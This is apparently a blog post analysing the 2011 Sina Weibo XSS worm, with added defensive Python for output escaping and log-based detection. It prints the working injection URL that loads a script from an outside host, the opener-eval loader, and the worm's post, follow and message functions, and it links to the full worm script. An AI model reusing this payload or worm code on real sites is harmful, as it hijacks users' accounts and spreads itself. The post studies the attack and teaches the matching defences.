XSS attacks: Cross-Site Scripting is abbreviated XSS rather than CSS, to avoid confusion with Cascading Style Sheets (CSS). XSS is a computer security vulnerability that often occurs in web applications. It allows malicious web users to inject code into pages served to other users.
XSS example (the hellosamy worm incident 6.9 on Sina Weibo):
Sina's Hall of Fame page has a link like this:
<a href="http://weibo.com/pub/star/g/123">This is xss</a>
On the server side this is presumably generated by something like the following (a guess: the real code is unknown, but it must output the value without escaping it):
echo "<a href=\"http://weibo.com/pub/star/g/{$uname}\">This is xss</a>";
The uname is not passed through htmlspecialchars, so user input is taken as-is and output directly into the page.
Such HTML has an XSS vulnerability.
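The following is an added example, not code from the original post or from Sina: it reproduces the guessed echo above in Python with a constructed payload-shaped username, and puts next to it the rendering a defender would want, where the username is URL-encoded as a path segment and the whole attribute value is then HTML-escaped. The sample hostname example.invalid and the function names are assumptions for illustration.

```python
import html
from urllib.parse import quote

# Constructed sample input shaped like the worm's username (not the real value):
# it closes the href attribute with a quote and injects a script tag.
SAMPLE_UNAME = 'x"><script src=//example.invalid/t.js></script>'


def render_link_vulnerable(uname: str) -> str:
    """Mirrors the post's guessed PHP echo: raw concatenation, no escaping."""
    return f'<a href="http://weibo.com/pub/star/g/{uname}">This is xss</a>'


def render_link_safe(uname: str) -> str:
    """Defensive rendering: encode for the URL path context first, then for
    the HTML attribute context (quote=True also escapes " and ')."""
    path_segment = quote(uname, safe="")  # " -> %22, < -> %3C, / -> %2F, ...
    href = f"http://weibo.com/pub/star/g/{path_segment}"
    return f'<a href="{html.escape(href, quote=True)}">This is xss</a>'


def contains_injected_tag(markup: str) -> bool:
    """Crude check used here only to show the difference: a literal <script
    anywhere in the rendered markup means the attribute was broken out of."""
    return "<script" in markup.lower()


if __name__ == "__main__":
    print(render_link_vulnerable(SAMPLE_UNAME))  # broken attribute + script tag
    print(render_link_safe(SAMPLE_UNAME))        # one long, harmless href
```

For a normal name such as alice both functions produce the same link; the two versions only diverge when the input carries attribute or tag delimiters, which is exactly the case output escaping exists for.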
OK, the vulnerability has been found. What can be done with it next?
1. Set uname to xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update
In this way, the URL becomes:
The quotation mark is closed, and the page automatically runs a JS script.
This JS script does the following:
1. Sends a microblog post (this is what makes it a worm: the post carries the same link)
2. Follows uid 2201270010
3. Sends private messages carrying the link to friends
The JS can be downloaded from http://www.stwind.org/wp-content/uploads/2011/06/06.28_sina_XSS.txt.zip
try {
    x = "g=document.createElement('script');g.src='http://www.2kt.cn/images/t.js';document.body.appendChild(g)";
    window.opener.eval(x);
} catch (e) {}
main();
var t = setTimeout('location="http://weibo.com/pub/topic";', 5000);
A script node is appended to the opener page and executed there.
In main, the Weibo post is sent, followed by the follow and the private messages.
After 5000 ms the current page is redirected to pub/topic.
function main() {
    try {
        publish();
    } catch (e) {}
    try {
        follow();
    } catch (e) {}
    try {
        message();
    } catch (e) {}
}
For example:
function publish() {
    url = 'http://weibo.com/mblog/publish.php?rnd=' + new Date().getTime();
    data = 'content=' + random_msg() + '&pic=&styleid=2&retcode=';
    post(url, data, true);
}
This simulates a POST request. Because the JS runs inside the weibo.com page itself, there is no cross-origin restriction:
a direct POST is enough to produce this effect.
Note: the short-link service was also used in this incident.
The short-link service will shorten any user-supplied link, such as http://weibo.com/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update
so that long link becomes http://t.cn/atmcqn,
which raises the click-through rate.
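Because the payload travels percent-encoded in the URL path (and a short link hides it from the user, not from the server), the place a defender can still see it is the web server access log. The following is an added example, not part of the original post: a small detector that percent-decodes each request path (repeatedly, so double-encoded variants also surface) and flags paths containing attribute or tag delimiters. The log lines are constructed in common log format with documentation IP addresses and the hostname example.invalid; none of them are real Weibo logs.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed access-log lines (common log format); not real Weibo traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [28/Jun/2011:20:01:12 +0800] "GET /pub/star/g/123 HTTP/1.1" 200 5120
203.0.113.9 - - [28/Jun/2011:20:01:13 +0800] "GET /pub/star/g/xyyyd%22%3E%3Cscript%20src=//example.invalid/t.js%3E%3C/script%3E?type=update HTTP/1.1" 200 5300
198.51.100.2 - - [28/Jun/2011:20:01:14 +0800] "GET /pub/star/g/x%2522%253E%253Cscript%253E HTTP/1.1" 200 5300
198.51.100.7 - - [28/Jun/2011:20:01:15 +0800] "GET /mblog/publish.php?rnd=1309262475 HTTP/1.1" 200 80
"""

# Pull the request path out of the quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/')
# Characters that can close an HTML attribute or open a tag; a path segment
# that was meant to be a username has no business containing them.
MARKUP_RE = re.compile(r'[<>"\']')


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing, bounded so a
    deliberately deep encoding cannot make us loop for long."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_requests(log_text: str) -> List[Dict[str, str]]:
    """Return one record per request whose decoded path carries markup."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path = m.group("path")
        decoded = fully_decode(path)
        if MARKUP_RE.search(decoded):
            hits.append({"client": line.split()[0], "path": path, "decoded": decoded})
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit["client"], hit["decoded"])
```

The check is deliberately narrow (delimiters in a path that should be a plain identifier) so that it is cheap to run over a full day of logs; the decoded form is kept in the record so an analyst can see the injected markup without re-decoding by hand.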
It turns out that you need to be very careful when building a website: every page, every output. One or two vulnerabilities can cause a disaster for the whole site!! Lessons!
Useful links:
http://www.bkjia.com/Article/201110/107620.html
----------------------
Author: yjf512 (Xuan Mai blade)